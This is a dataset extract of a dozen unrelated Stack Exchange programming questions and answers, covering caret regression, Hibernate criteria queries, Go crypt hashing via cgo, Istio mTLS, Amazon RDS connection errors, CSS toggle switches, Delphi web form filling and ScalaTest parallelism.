text
stringlengths
70
452k
dataset
stringclasses
2 values
Logistic Regression in Caret - No Intercept? Performing logistic regression in R using the caret package and trying to force a zero intercept such that probability at x=0 is .5. In other forms of regression, it seems like you can turn the intercept off using tunegrid, but that has no functionality for logistic regression. Any ideas? model <- train(y ~ 0+ x, data = data, method = "glm", family = binomial(link="probit"), trControl = train.control) And yes, I "know" that the probability at x=0 should be .5, and thus trying to force it. You said logistic regression multiple times but your code implies probit regression. It doesn't really make a difference but just wondering if there's a reason for that. There's a vignette on how to set up a custom model for caret. So in the solution below, you can also see why the intercept persist: library(caret) glm_wo_intercept = getModelInfo("glm",regex=FALSE)[[1]] if you look at the fit, there's a line that does: glm_wo_intercept$fit .... modelArgs <- c(list(formula = as.formula(".outcome ~ ."), data = dat), theDots) ... So the intercept is there by default. You can change this line and run caret on this modified model: glm_wo_intercept$fit = function(x, y, wts, param, lev, last, classProbs, ...) { dat <- if(is.data.frame(x)) x else as.data.frame(x) dat$.outcome <- y if(length(levels(y)) > 2) stop("glm models can only use 2-class outcomes") theDots <- list(...) if(!any(names(theDots) == "family")) { theDots$family <- if(is.factor(y)) binomial() else gaussian() } if(!is.null(wts)) theDots$weights <- wts # change the model here modelArgs <- c(list(formula = as.formula(".outcome ~ 0+."), data = dat), theDots) out <- do.call("glm", modelArgs) out$call <- NULL out } We fit the model: data = data.frame(y=factor(runif(100)>0.5),x=rnorm(100)) model <- train(y ~ 0+ x, data = data, method = glm_wo_intercept, family = binomial(),trControl = trainControl(method = "cv",number=3)) predict(model,data.frame(x=0),type="prob") FALSE TRUE 1 0.5 0.5
common-pile/stackexchange_filtered
'mysql' is not recognized as an internal or external command, operable program or batch file Please help me. D:\wamp>cd D:\wamp\bin\mysql\mysql5.6.17 D:\wamp\bin\mysql\mysql5.6.17>set path=%PATH%;D:\wamp\bin\mysql\mysql5.6.17 D:\wamp\bin\mysql\mysql5.6.17>mysql -u root -p 'mysql' is not recognized as an internal or external command, operable program or batch file. D:\wamp\bin\mysql\mysql5.6.17> Maybe is the "bin" subdirectory missing in your path? D:\wamp\bin\mysql\mysql5.6.17\bin It seems you have to specify the full path to the MySQL program itself (mysql.exe). Use D:\wamp\bin\mysql\mysql5.6.17\bin\mysql.exe -u username -p
common-pile/stackexchange_filtered
What is Go's equivalent to Python's crypt.crypt? I am currently playing around with an example from the book Violent Python. You can see my implementation here I am now trying to implement the same script in Go to compare performance, note I am completely new to Go. Opening the file and iterating over the lines is fine, however I cannot figure out how to use the "crypto" library to hash the string in the same way as Python's crypt.crypt(str_to_hash, salt). I thought it maybe something like import "crypto/des" des.NewCipher([]byte("abcdefgh")) However, no cigar. Any help would be much appreciated as it'd be really interesting to compare Go's parallel performance to Python's multithreaded. Edit: Python docs for crypt.crypt "Python's multithreaded" 'Nuff said. I'm aware it is not testing like for like, I'm just interested to see how much faster Go will be. Likely at least an order of magnitude I'm guessing Be careful comparing Go's concurrent performance with Python's multithreaded. Potentially, you'd see Go running more slowly because the Go runtime may actually use fewer (or only one) OS threads, so the Go routines are being timesliced onto CPU core(s). The difference between concurrency and parallelism is a good feature of Go but you could get caught out. More: http://golang.org/doc/effective_go.html#parallel crypt is very easy to wrap with cgo, eg package main import ( "fmt" "unsafe" ) // #cgo LDFLAGS: -lcrypt // #define _GNU_SOURCE // #include <crypt.h> // #include <stdlib.h> import "C" // crypt wraps C library crypt_r func crypt(key, salt string) string { data := C.struct_crypt_data{} ckey := C.CString(key) csalt := C.CString(salt) out := C.GoString(C.crypt_r(ckey, csalt, &data)) C.free(unsafe.Pointer(ckey)) C.free(unsafe.Pointer(csalt)) return out } func main() { fmt.Println(crypt("abcdefg", "aa")) } Which produces this when run aaTcvO819w3js Which is identical to python crypt.crypt >>> from crypt import crypt >>> crypt("abcdefg","aa") 'aaTcvO819w3js' >>> (Updated to free the CStrings - thanks @james-henstridge) The OP wanted to compare the speed of a Python implementation to a Go implementation. With this approach he would be benchmarking the C implementation against the same C implementation. He would be effectively just benchmarking Python's C wrapper against Go's C wrapper. The OP specifically wanted to compare the parallel performance of crypt in python and crypt in go - this will give a good comparison of the differing concurrency capabilities since they will be using the same C library underneath. IMHO it would be more fair to benchmark parallel performance with native code. The concurrency capabilities of a language may be limited when using an external non-native library (for example with Go the Go scheduler can not do anything while the program or an OS thread is running external library code). OTOH if the algorithm is implemented in native code, it will be difficult to limit the benchmark to compare only the concurrency capabilities as the resulting code will be different due to language/compiler/interpreter differences. This is a harder problem than I initially thought. This looks like you're leaking the C.CString versions of key and salt. You will need to explicitly free those values. I believe there isn't currently any publicly available package for Go which implements the old-fashioned Unix "salted" DES based crypt() functionality. This is different from the normal symmetrical DES encryption/decryption which is implemented in the "crypto/des" package (as you have discovered). You would have to implement it on your own. There are plenty of existing implementations in different languages (mostly C), for example in FreeBSD sources or in glibc. If you implement it in Go, please publish it. :) For new projects it is much better to use some stronger password hashing algorithm, such as bcrypt. A good implementation is available in the go.crypto repository. The documentation is available here. Unfortunately this does not help if you need to work with pre-existing legacy password hashes. Edited to add: I had a look at Python's crypt.crypt() implementation and found out that it is just a wrapper around the libc implementation. It would be simple to implement the same wrapper for Go. However your idea of comparing a Python implementation to a Go implementation is already ruined: you would have to implement both of them yourself to make any meaningful comparisons. E.g. package main import ( "crypto/des" "fmt" "log" ) func main() { b, err := des.NewCipher([]byte("abcdefgh")) if err != nil { log.Fatal(err) } msg := []byte("Hello!?!") fmt.Printf("% 02x: %q\n", msg, msg) b.Encrypt(msg, msg) fmt.Printf("% 02x: %q\n", msg, msg) b.Decrypt(msg, msg) fmt.Printf("% 02x: %q\n", msg, msg) } (Also: http://play.golang.org/p/czYDRjtWNR) Output: 48 65 6c 6c 6f 21 3f 21: "Hello!?!" 3e 41 67 99 2d 9a 72 b9: ">Ag\x99-\x9ar\xb9" 48 65 6c 6c 6f 21 3f 21: "Hello!?!" Thanks for this, it's really useful to have a fully working example. In Python one would pass the string to encrypt and an optional two char salt eg. crypt.crypt('abc', '12') -> '12BWKETBcM70Q', however the above example does not return the same. Does the returned cipher.Block need to be cast to crypto.Hash to achieve the same? This is not relevant to the question. Symmetrical DES encryption is somewhat different from the traditional Unix crypt() function (which is DES based with some salt mixed in, but certainly not the same). My bad, I should have been more explicit in my question. Python's crypt.crypt() runs the crypt(3) password, standard in Unix password hashing. crypt(3) is a variant on DES. Good news! There's actually an open source implementation of what you're looking for. Osutil has a crypt package that reimplements crypt in pure Go. https://github.com/kless/osutil/tree/master/user/crypt
common-pile/stackexchange_filtered
Running Play Framework 2.0 in Windows, got a NoClassDefFoundError I'm trying to run Play Framework 2.0 in windows (XP), but when I launch play, I got this exception : >play.bat Exception in thread "main" java.lang.NoClassDefFoundError: and Caused by: java.lang.ClassNotFoundException: and at java.net.URLClassLoader$1.run(Unknown Source) at java.security.AccessController.doPrivileged(Native Method) at java.net.URLClassLoader.findClass(Unknown Source) at java.lang.ClassLoader.loadClass(Unknown Source) at sun.misc.Launcher$AppClassLoader.loadClass(Unknown Source) at java.lang.ClassLoader.loadClass(Unknown Source) Could not find the main class: and. Program will exit. I can't find why I have this error. Of course I have Java installed : >java -version java version "1.6.0_31" Java(TM) SE Runtime Environment (build 1.6.0_31-b05) Java HotSpot(TM) Client VM (build 20.6-b01, mixed mode, sharing) And javac : >javac -version javac 1.6.0_31 What am I missing? Ok, for those who have the same problem, it's quite simple in fact. I was running Play in "My Documents" and the whole path contained space. In order for Play! to work, you'll have to put your project in a folder without spaces, like : C:\dev\play\2.0\ And it will work :) I suggest you create a ticket for this on https://play.lighthouseapp.com/dashboard
common-pile/stackexchange_filtered
2013 MBP unable to see new internal SSD So I have a 2013 MBP that I'm trying to install to give to my friend. I've bee running a 500GB Samsung Evo 850 for a few years. I'm trying to put in a 250GB one in. I've managed to install macOS High Sierra when in a usb cage I've got. It boots just fine off of my original SSD. So I don't think it's the cable or the ssd. I've been installing off of a USB installer I made using my new macbook. I've reset the SMC and PRAM. EDIT: No idea what's going on. I've given up and left the 500GB drive in the computer while I keep the 250GB with my stuff on it on the side. Does disk utility see it? No. Not even showing all devices. Is the new SSD properly formatted? I’ve had issues before where the drive was still FAT or whatever, but the Mac partition was properly formatted and looked ok. So it doesn't show even when I click show all drives. My old ssd does and is fine. So when I boot off of the USB, go into Disk Utility, I can't even format it there. I had to format it from another computer. It also boots off of it. I got to the OS setup screen when attached via USB, so it's installed the os. Was also formatted to MacOS Journaled with a GUID partition.
common-pile/stackexchange_filtered
mTLS between services running inside and outside a mesh using Istio's trust chain I understand that I can configure Istio for its Citadel component to use a root x509 certificate + private key that I provide. Can I extend this system in a way that I also use the same root to issue certificates to legacy workloads running in the same k8s cluster, and then configure a destination rule to access these workloads from inside the mesh? Something like: --- apiVersion: networking.istio.io/v1alpha3 kind: DestinationRule metadata: name: originate-mtls spec: host: mymtls-app.legacy.svc.cluster.local trafficPolicy: portLevelSettings: - port: number: 8443 tls: mode: ISTIO_MUTUAL sni: mymtls-app.legacy.svc.cluster.local Can the above work? Do I need any additional configuration besides the above? I may not be in a position to run spiffe / spire to manage the certificates for workloads outside the mesh - which puts a spiffe-federation solution like this somewhat out of reach for me. But this also doesn't seem like a fully supported mechanism in any case. I have been able to configure mTLS using a separate certificate hierarchy which I have to inject via secrets and mount into the pods / sidecars in question (illustrated here). If you are using your own certificates then you need to use mode: MUTUAL and other attributes https://istio.io/latest/docs/reference/config/networking/destination-rule/ @NatarajMedayhal, what does the DestinationRule documentation link add to the discussion? Could you point out which specific section or line is relevant to the question above? If you want to use own certificate and private keys instead of citadel then you need to use mode: Mutual. The link has attributes which needs to be used. If mode is ISTIO_MUTUAL it will automatically generates those.
common-pile/stackexchange_filtered
Microwave links If the record for microwave links is 235km long, and the microwave waves must travel in a straight line (and cannot go through solids such as the sea or objects in between), then how did they account for the curvature of the Earth? 235km should have too much curvature to see the receiver pole. The scenario is explained in 10:17 in this video. https://www.youtube.com/watch?v=PZcrSyMM1ZM&t=705s A lot of the long distance links are over bodies of water eg the Red Sea. The refractive index of air is slightly greater than one and decreases with height. Due to the vertical change in refractive index the microwaves undergo refraction. So the path of the microwaves is not along a straight line. . The images came from Point-to-Point Radio Link Engineering.
common-pile/stackexchange_filtered
Power Query Function to search for matching keywords in a table of lists and return the text in the cel in front of the matching row I have a similar problem but a bit more complex as this one : Power Query: Function to search a column for a list of keywords and return only rows with at least one match and this one : https://community.powerbi.com/t5/Desktop/Power-query-Add-column-with-list-of-keywords-found-in-text/td-p/83109 I have a Database with a lot of columns of which one is a free-text description string. On another Excel Sheet in the workbook, I've set up a Matching table to categorize the rows based on lists of keywords like this : category | keywords pets | dog, cat, rabbit,... cars | Porsche, BMW, Dodge,... ... The goal is to put a custom column in my database that will return the hereabove category (or categories ?) based on which listed keywords it can find in the description field. I think the solution above and the one from ImkeF are not so far but I didn't find a way to turn it into a successful Query for my case. (I'm good at Excel but quite a noob to M and programming Queries...) oriented on the obove posted links: M-Code for tbl_category: the keywords (separated with comma) will be split into rows let Source = Excel.CurrentWorkbook(){[Name="tbl_category"]}[Content], #"Replaced Value" = Table.ReplaceValue(Source," ","",Replacer.ReplaceText,{"keywords"}), #"Split Column by Delimiter" = Table.ExpandListColumn(Table.TransformColumns(#"Replaced Value", {{"keywords", Splitter.SplitTextByDelimiter(",", QuoteStyle.Csv), let itemType = (type nullable text) meta [Serialized.Text = true] in type {itemType}}}), "keywords"), #"Changed Type1" = Table.TransformColumnTypes(#"Split Column by Delimiter",{{"keywords", type text}}) in #"Changed Type1" M-Code for tbl_text. Here will be add a Custom Column called "Category": let Source = Excel.CurrentWorkbook(){[Name="tbl_text"]}[Content], #"Changed Type" = Table.TransformColumnTypes(Source,{{"Text", type text}}), #"Added Custom" = Table.AddColumn(#"Changed Type", "Category", (Earlier) => Table.SelectRows(tbl_category, each Text.Contains(Record.Field(Earlier, "Text"), Record.Field(_, "keywords"), Comparer.OrdinalIgnoreCase))), #"Expanded Category" = Table.ExpandTableColumn(#"Added Custom", "Category", {"Category"}, {"Category"}) in #"Expanded Category" Hi, thanks a lot for your answer... but I haven't succeed. First code works as expected (but the resulting table is not shown in your screenshot) The second code doesn't work with "tbl_category"... which is illustrated in your screenshot so I tried to replace "(Earlier) => Table.SelectRows(tbl_category," to point to the resulting table of first code. That way it doesn't give any error but the resulting column is full of "null" while there is well a table (2 columns & one or many rows) in each cell before the use of "Table.ExpandTableColumn" and I don't know why... BTW I would also like to avoid creating more rows in the resulting table and would prefer to retrieve the matching categories as a text in the resulting "category" column All right... I hadn't notice that the first {"Category"} in Table.ExpandTableColumn(#"Added Custom", "Category", {"Category"}, {"Category"}) was the name of the column in the nested table... I made the correction and now it works like you described :) I just need now to avoid the row duplication and retrieve a list (by purging duplicates) of the matching categories as a text string in the result column. I tried to replace the Table.Expand by Table.Split, List.FromTable, etc.... but haven't found somethig that works Ok, I've finally found how to build a query to suits my needs based on your steps above! Note : I used "Row Labels" to replace the column header of the 1st tbl_category column for clarity. My solution is not as neat as I would like (I had to create a second custom column because of my lack of knowledge on how to nest the two steps so they act on the same cell) but it works perfectly! So thanks again for your help Chris... without your leads I woudn't have found this maze exit! here the 2nd code modified: let Source = Excel.CurrentWorkbook(){[Name="tbl_text"]}[Content], #"Changed Type" = Table.TransformColumnTypes(Source,{{"Text", type text}}), #"Added Custom" = Table.AddColumn(#"Changed Type", "Category", (Earlier) => Table.SelectRows(tbl_category, each Text.Contains(Record.Field(Earlier, "Text"), Record.Field(_, "keywords"), Comparer.OrdinalIgnoreCase))), #"Added Custom1" = Table.AddColumn(#"Added Custom", "Custom", each Text.Combine(Table.ToList(Table.Transpose( Table.Distinct(Table.SelectColumns([Category],{"Row Labels"}))), Combiner.CombineTextByDelimiter(",")), ", ")), in #"Added Custom1" Greetz Looks like you did it :) Just for the record, Once applied to real data the query was not working anymore... giving the error "We cannot convert the value null to type Text." the solution was as easy as removing "null" cells (blank cells that were categories for which no keywords were yet identified) first! M-Code for tbl_category: let Source = Excel.CurrentWorkbook(){[Name="tbl_category"]}[Content], #"Filtered Rows" = Table.SelectRows(Source, each ([keywords] <> null)), #"Replaced Value" = Table.ReplaceValue(#"Filtered Rows"," ","",Replacer.ReplaceText,{"keywords"}), #"Split Column by Delimiter" = Table.ExpandListColumn(Table.TransformColumns(#"Replaced Value", {{"keywords", Splitter.SplitTextByDelimiter(",", QuoteStyle.Csv), let itemType = (type nullable text) meta [Serialized.Text = true] in type {itemType}}}), "keywords"), #"Changed Type1" = Table.TransformColumnTypes(#"Split Column by Delimiter",{{"keywords", type text}}) in #"Changed Type1" Greetz
common-pile/stackexchange_filtered
Toggle switch not change it state(ASP.NET MVC) I have toggle switch in my View Here is code .switch { position: relative; display: inline-block; width: 60px; height: 34px; } .switch input {display:none;} .slider { position: absolute; cursor: pointer; top: 0; left: 0; right: 0; bottom: 0; background-color: #ccc; -webkit-transition: .4s; transition: .4s; } .slider:before { position: absolute; content: ""; height: 26px; width: 26px; left: 4px; bottom: 4px; background-color: white; -webkit-transition: .4s; transition: .4s; } input:checked + .slider { background-color: #2196F3; } input:focus + .slider { box-shadow: 0 0 1px #2196F3; } input:checked + .slider:before { -webkit-transform: translateX(26px); -ms-transform: translateX(26px); transform: translateX(26px); } /* Rounded sliders */ .slider.round { border-radius: 34px; } .slider.round:before { border-radius: 50%; } <div id="switcher" class="doctors-appointment"> <div class="Row"> <div class="Column"> <b>Doctor's appointment</b> </div> <div class="Column"> <label class="switch"> <input type="checkbox"> <span class="slider round"></span> </label> </div> <div class="Column"> <b>For internal purposes</b> </div> </div> </div> In this snippet all okay. But when I run it on my machine toggle switch not change it state.In console I have no errors. I tried to create new css file for toggle and include it in View. But this not helps. In what it may be problem? Thank's for help. What does this have to do with asp.net? Project is ASP.NET @Marco And what do you mean it does not change state? Does the checkbox not work or do CSS styles not get applied? it always grey and don't changing state @Marco Your code does work here on Stackoverflow, which means you are not showing us everything. @SukhomlinEugene did you ever solve your issue with the toggle switch when you submit your form does it submit the correct value based on the on or off state?
common-pile/stackexchange_filtered
PDF link goes to "Cannot GET file" with a 404 error Trying to have a link open up to a PDF. I have the href="filename.pdf" - the pdf file is in the same folder as the html file. When I click on the link it opens to a new page (I have it set to open a new page) which says "Cannot GET /filename.pdf". I open the console and it says "Failed to load resource: the server responded with a status of 404 (Not Found)". I found a solution that works but I don't understand why: This doesn't work: <a target="_blank" class="cta-btn cta-btn--resume" href="connerschiller.pdf">View Resume</a> But this does work: <a target="_blank" class="cta-btn cta-btn--resume" href="../src/connerschiller.pdf">View Resume</a> The html file is in the src folder as well. Ok so the fix I listed above is working when I run it locally, but when I try to open the PDF link on the deployed site on netlify it says "Page Not Found Looks like you've followed a broken link or entered a URL that doesn't exist on this site." Could you please add some code? Well I sort of found an answer...I had to move back out of the folder, go back into the same folder, and then it worked. That just doesn't make sense to me, but I'll try to add the line of code to my question. do you may have a src folder and another like "build" where the html is? I think the problem is not in your markup but on the file structure If the file is in the same directory you need to use as follows: <a href="./filename.pdf">My pdf</a> the ./ is to especify the same directory
common-pile/stackexchange_filtered
Unable to connect to Amazon RDS instance I am trying to connect to an RDS instance via my Macbook (M1, Sonoma 14.2.1), and am constantly running into this error. Initially I thought the error was that my instance was not publicly accessible, which I have now changed. Error message here: Unable to connect to the database: HostNotFoundError [SequelizeHostNotFoundError]: getaddrinfo ENOTFOUND your_amazon_rds_host at Client._connectionCallback (/Users/as/Desktop/sample_app/node_modules/sequelize/lib/dialects/postgres/connection-manager.js:134:24) at Client._handleErrorWhileConnecting (/Users/as/Desktop/sample_app/node_modules/pg/lib/client.js:327:19) at Client._handleErrorEvent (/Users/as/Desktop/sample_app/node_modules/pg/lib/client.js:337:19) at Connection.emit (node:events:519:28) at Socket.reportStreamError (/Users/as/Desktop/sample_app/node_modules/pg/lib/connection.js:58:12) at Socket.emit (node:events:519:28) at emitErrorNT (node:internal/streams/destroy:169:8) at emitErrorCloseNT (node:internal/streams/destroy:128:3) at process.processTicksAndRejections (node:internal/process/task_queues:82:21) { parent: Error: getaddrinfo ENOTFOUND your_amazon_rds_host at GetAddrInfoReqWrap.onlookupall [as oncomplete] (node:dns:118:26) { errno: -3008, code: 'ENOTFOUND', syscall: 'getaddrinfo', hostname: 'your_amazon_rds_host' }, original: Error: getaddrinfo ENOTFOUND your_amazon_rds_host at GetAddrInfoReqWrap.onlookupall [as oncomplete] (node:dns:118:26) { errno: -3008, code: 'ENOTFOUND', syscall: 'getaddrinfo', hostname: 'your_amazon_rds_host' } } For what it's worth, here are some relevant details I have included in my .env file: AWS RDS Instance: Endpoint: database-1.servername.us-east-1.rds.amazonaws.com Username: postgres Password: RandomPassword DB Instance Identifier: database-1 Database Port: 5432 Security Group Inbound Rules Type: All traffic Protocol: All Port Range: All What am I missing? When you say that you are "constantly running into this error", are you saying that it sometimes gives the error, or it has always had an error? That is, have you ever been able to connect to the RDS database? First thing would be to check whether you can resolve the DNS name. If you are on Linux, you can use nslookup database-1.servername.us-east-1.rds.amazonaws.com. Or, you can ping database-1.servername.us-east-1.rds.amazonaws.com and see whether it displays an IP address (ignore whether Ping works). Let us know how it goes! Please Edit your Question and include the configuration of the Security Group Inbound rules. Thanks - I have added the rules now. It is always an error, not seen it work at all. It does appear that I can resolve DNS name, since when I pinged the database, it showed me an IP address, although the Ping itself failed. You might want to compare what you did with the steps shown in: Unable to connect to public RDS instance Also, try using a different program to connect to Postgres -- it might give a more friendly error message There is some inconsistency here, you are trying to connect to hostname: 'your_amazon_rds_host', but the instance name that you have noted is database-1, plus the endpoint is database-1.servername.us-east-1.rds.amazonaws.com. What is the actual public hostname? When you made your instance publicly available, did you use the --apply_immdiately flag? Otherwise, it won't change until the next maintenance window. Can you post your sequelize code, i.e how you're connecting. Where have you defined your_amazon_rds_host because syscall: 'getaddrinfo' is telling you that the getaddrinfo() function basically cant get an ip for your_amazon_rds_host. please check all these think The error message you are encountering (getaddrinfo ENOTFOUND your_amazon_rds_host) Check the RDS Instance Status Correct Hostname or IP Address Security Group and Firewall Settings Thanks for your response. RDS Instance Status is 'Available' Hostname is copied directly from the dashboard, and is correct. Not sure what to look for in the Security Group, but see as 'default', and '1 Permission entry' under 'Inbound rules count'. Check your VPC and subnet in which you created your RDS is it a public subnet or private subnet ? - use a public subnet check NACL and Route table settings too - default ones allow all, but when you create new ones, they block all. is there a Igw connected to your Route table ? - required for internet connection. I'll advise doing the basic checks to confirm that your machine can reach the database. The error seems to be coming from your application and not the database. Forget about connecting to the database for a second. Confirm that there is no typo in the hostname you are connecting to. Confirm if the hostname can be resolved to an IP on your Mac. Do a nslookup to the hostname from your terminal. Try pinging the hostname or IP to confirm if you get a response. Try to telnet the hostname/ IP on the port it listens on. We will know where to focus our attention on (application, network or database) after doing these checks.
common-pile/stackexchange_filtered
How to allow dynamic interface for a native JS trait in Scala 3? Following facade trait for three.js works fine with Scala 2: @js.native trait Uniforms extends js.Object with Dynamic { @JSBracketAccess def update(name: String, uniform: Uniform): Unit @JSBracketAccess def apply(name: String): Uniform @JSName("remove") def -=(name: String): Uniform @JSBracketAccess def selectDynamic(name: String): Uniform @JSBracketAccess def updateDynamic(name: String)(value: Uniform): Unit } It allows me to use uniforms both as u("opacity").value = 0.5 and u.opacity.value = 0.5. The trouble is it does not work with Scala 3. It compiles fine, but it produces an error in while linking (fastOptJS): [error] scala.Dynamic (of kind Interface) is not a valid interface implemented by threejs.Uniforms (of kind AbstractJSType) [error] called from threejs.Uniforms How can I define a facade for a native JS type in Scala 3 so that I can use it as Dynamic ? Deriving from js.Dynamic is not possible, as it is sealed. That's a bug in Scala 3. Please report it at https://github.com/lampepfl/dotty/issues/new/choose Done in https://github.com/lampepfl/dotty/issues/19528 I guess fixing this will take some time - Scala 3 releases are not very frequent. It could be nice to know what options are there as a workaround until the fix is available. I don't think there exists any workaround besides calling u("opacity") instead of u.opacity. In theory you could write a preprocessor for the IR generated for Uniforms to remove scala.Dynamic from its list of interfaces, but that is probably too much effort. Depending on your setup, you could also put Uniforms.scala in a Scala 2.13 project and depend on it from Scala 3 (this works, and is why js.Dynamic works in the first place from Scala 3).
common-pile/stackexchange_filtered
Jquery - Can you stop a div from updating until action in div is done? Using jquery I am calling a php page using an ajax call. I call this every 60 seconds. The ajax call calls the php script, php script gets the rows from the db, returns the result back to the ajax call and upon success jquery updates a div with the new data. My question is, can you have the div update part upon success detect if the user is doing an action in that div and not update that div until the person is done with that action? For example if the rows displaying in the div allow you to edit the data in place using jquery and the person clicks a row to edit in place, I dont want the div to update with new data until the person is done updating that row. Is that possible in jquery? It would help to see your actual code, but I would simply suspend that AJAX call whenever a user begins editing and restart it when they're done. If you're using setInterval to start the check every 60 seconds, use clearInterval to abort it. You can catch focus or blur events and have something flag the form they're working on is "dirty" (which then the ajax call would check before performing any new updates). Or you can re-work the UI to hide any forms until they initiate they want to change it (i.e. an update link that exposes the form) then flag "working" until they either save their update or cancel out of any changes. Basically, what this site does when you want to in-line edit a post and go to leave the page "Your form is open, are you sure you want to leave the page" kind of warning.
common-pile/stackexchange_filtered
Invalid Variant Operation error when access WebBrowser1.OleObject.Document.getElementById('Inputname').setAttribute I am using TWebBrowser component in Delphi XE7 (win7, internet explorer 9) to fill a form in webpage. Here is the HTML: <input name="login" class="form-control" id="inputLogin" placeholder="Username" type="text"> I am using this code: WebBrowser1.OleObject.Document.getElementById('InputLogin').setAttribute('value','sometext'); It works great on my PC, but on other PC it gives me this error: Invalid Variant Operation error. How can I fix this? My guess would be that the other pc is missing a dll. It can be one of your own Delphi project or a MS dll required by the browser component. Does the other PC have a different browser version? -- Also, document.getElementById is case sensitive --> your ID is not with a capital 'Input....' setAttribute is not the preferred way to set/get the value for an input element. use IHTMLInputElement interface to access the value of the target input element e.g.: uses MSHTML; var el: IHTMLElement; inputElement: IHTMLInputElement; el := (WebBrowser1.Document as IHTMLDocument3).getElementById('inputLogin'); if Assigned(el) then if Supports(el, IID_IHTMLInputElement, inputElement) then inputElement.value := 'sometext'; I could not reproduce the error you got, so if you insist on using setAttribute, you might want to try to explicitly set the interface for the document instead of accessing OleObject.Document Variant. e.g.: el := (WebBrowser1.Document as IHTMLDocument3).getElementById('inputLogin'); if Assigned(el) then el.setAttribute('value', 'sometext', 0); thank you kobik very much, it was very helpful, yes indeed using setattribut causing the issue of invalid variant (may the value is empty). Thank you again, you save me alot of time and effort. You are welcome. if this answered your question please accept it. BTW, out of curiosity: Did the second approach via el.setAttribute worked for you on the other PC? yes it does , it seem that the value of variant is always null for my first solution
common-pile/stackexchange_filtered
ParallelTestExecution with FlatSpec, Selenium DSL and Spring I am using Scalatest, FlatSpec, Spring, Selenium DSL and BeforeAndAfterAll. One of these things seems to stop ParallelTestExecution working properly. This is what happens when I run a class with two tests: One Browser opens and does some beforeAll stuff (but not Spring stuff) Another browser opens and does the beforeAll stuff Second browser gets used for first test then closes Another browser opens and does beforeAll stuff followed by second test First and Third browsers close So basically the test runs exactly the same as without ParallelTestExecution except that an extra window has opened? Do you want to accept the answer? Did it work for you? Good point, accepted as it worked thanks. It was an answer from Bill himself so no surprise :) I think you may be observing two different effects. First, ParallelTestExecution extends OneInstancePerTest. It runs each test in its own instance to reduce the likelihood of shared mutable state between tests introducing concurrency Heisenbugs into your tests. But the way it does this is the initial instance of your test class creates an instance for each test and passes those to the distributor (if defined), which will run them in parallel. So since you have two tests, you will get three instances of your test class--the initial instance that runs on the main thread, and the two test-specific instances, one per test, that can run those tests in parallel. Since your beforeAll and afterAll methods have a side effect of creating and closing a web browser, you see that side effect three times. The other thing that may be happening is that ParallelTestExecution will only run tests in parallel if you tell ScalaTest you want parallel execution in general. If you're using Runner, that's done by passing in -P. Otherwise the distributor will not be defined, in which case ParallelTestExecution just executes the tests sequentially on the main thread (the thread that called run). ParallelTestExecution is intended for rather rare cases when you actually need to execute tests in the same test class in parallel. An example might be a test class that has lots of very slow tests. In most cases I expect ScalaTest's default approach of running Suites in parallel should give you as good a performance boost as running tests in parallel. To get that kind of parallel execution you need not mix in any trait (i.e., no need for ParallelTestExecution). Just pass -P to Runner, or tell sbt to run ScalaTest in parallel, etc. Also, BeforeAndAfterAll is meant for things that need to happen before and after all tests and nested suites. If you want each test to have its own browser, then you probably want to use BeforeAndAfterEach instead. This would give you just two browsers popping up, not three, in the ParallelTestExecution case. If you really wanted all tests to share the same browser, then I'd check the Selenium documentation to ensure that's possible. It may be that Selenium only let's you do one interaction at a time with a given WebBrowser driver. In summary, if I am guessing correctly what you're really trying to accomplish, I'd drop ParallelTestExecution, change BeforeAndAfterAll to BeforeAndAfterEach (or use withFixture), and pass -P to Runner (directly, via ant or Maven) or ask sbt to run ScalaTest in parallel. Great answer. My tests all test one feature and so IMO belong in one class. Unfortunately each test does different things that take some time so it would be advantageous if I could get them running in parallel. When I wrote the test I didn't think about ParallelTestExecution so that's why I used BeforeAndAfterAll. I see now that if I want to use ParallelTestExecution I should use BeforeAndAfterEach. I'll give it a go on Tuesday. Do you know by chance how I enable parallel execution using the scalatest maven plugin and also Intellij? This worked perfectly thanks. Needed to add -P test parameter in IntelliJ and true in maven scalatest plugin. Also needed to add an afterAll method to quit the distributor instance of webdriver.
common-pile/stackexchange_filtered
Hibernate query for multiple items in a collection I have a data model that looks something like this: public class Item { private List<ItemAttribute> attributes; // other stuff } public class ItemAttribute { private String name; private String value; } (this obviously simplifies away a lot of the extraneous stuff) What I want to do is create a query to ask for all Items with one OR MORE particular attributes, ideally joined with arbitrary ANDs and ORs. Right now I'm keeping it simple and just trying to implement the AND case. In pseudo-SQL (or pseudo-HQL if you would), it would be something like: select all items where attributes contains(ItemAttribute(name="foo1", value="bar1")) AND attributes contains(ItemAttribute(name="foo2", value="bar2")) The examples in the Hibernate docs didn't seem to address this particular use case, but it seems like a fairly common one. The disjunction case would also be useful, especially so I could specify a list of possible values, i.e. where attributes contains(ItemAttribute(name="foo", value="bar1")) OR attributes contains(ItemAttribute(name="foo", value="bar2")) -- etc. Here's an example that works OK for a single attribute: return getSession().createCriteria(Item.class) .createAlias("itemAttributes", "ia") .add(Restrictions.conjunction() .add(Restrictions.eq("ia.name", "foo")) .add(Restrictions.eq("ia.attributeValue", "bar"))) .list(); Learning how to do this would go a long ways towards expanding my understanding of Hibernate's potential. :) The answer here works: http://stackoverflow.com/questions/4834372/hibernate-criteria-on-collection-values Could you use aliasing to do this? Criteria itemCriteria = session.createCriteria(Item.class); itemCriteria.createAlias("itemAttributes", "ia1") .createAlias("itemAttributes", "ia2") .add(Restrictions.eq("ia1.name", "foo1")) .add(Restrictions.eq("ia1.attributeValue", "bar1"))) .add(Restrictions.eq("ia2.name", "foo2")) .add(Restrictions.eq("ia2.attributeValue", "bar2"))) Not sure how hibernate handles joining on the same property twice explicitly like that, maybe worth trying? I get a org.hibernate.QueryException: duplicate association path: itemAttributes SELECT item FROM Item item JOIN item.attributes attr WHERE attr IN (:attrList) GROUP BY item and then in the Java code: List<ItemAttribute> attrList = new ArrayList<ItemAttribute>(); attrList.add(..); // add as many attributes as needed ...// create a Query with the above string query.setParameter("attrList", attrList); This looks like it address the OR case (i.e. the Item has at least one ItemAttribute that we specify in the attrList), but what about the AND case? Would it be something like WHERE attr1 in item.attributes AND attr2 in item.attributes etc. ? Does that even make sense to Hibernate? Also, I appear to be getting a stack trace when trying to do the above. The root error: Caused by: java.lang.IllegalArgumentException: Can not set java.lang.Integer field com.mycompany.domain.ImmutableDomainEntity.id to java.util.ArrayList You are getting an error because you're trying to alias a set (ItemAttributes) to a single entity (attr). You can only use the IN clause with a single entity. A better (working) way would be to invert the query: "SELECT a.item from ItemAttribute a WHERE a.name IN (:attrlist)" - no explicit JOIN is required if you have mapped the relationships properly. That would seem to get me all the Items with the listed attribute names, but now how do I specify the specific values for those 